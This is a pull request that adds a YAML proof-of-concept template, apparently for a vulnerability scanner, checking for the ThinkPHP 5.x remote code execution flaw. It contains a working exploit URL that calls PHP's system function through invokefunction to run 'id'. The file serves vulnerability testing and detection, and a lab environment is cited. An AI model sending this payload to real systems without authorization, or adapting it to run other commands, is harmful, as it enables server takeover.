### PR TITLE
Create poc-yaml-thinkphp-5.x-rce.yml

### DIFF
--- a/pocs/poc-yaml-thinkphp-5.x-rce.yml
+++ b/pocs/poc-yaml-thinkphp-5.x-rce.yml
@@ -1,0 +1,16 @@
+name: poc-yaml-thinkphp-5.x-rce
+rules:
+  - method: GET
+    path: >-
+      /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
+    headers:
+      User-Agent: >-
+        Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
+        like Gecko) Chrome/76.0.3809.100 Safari/537.36
+    follow_redirects: true
+    expression: |
+      status==200
+    search: uid=(\d+)
+detail:
+  author: ldqsmile
+  vulhub: https://www.vulnspy.com/cn-thinkphp-5.x-rce/


### PR DESCRIPTION

## 本 poc 是测试ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用（GetShell）

## 测试环境
 https://www.vulnspy.com/cn-thinkphp-5.x-rce/

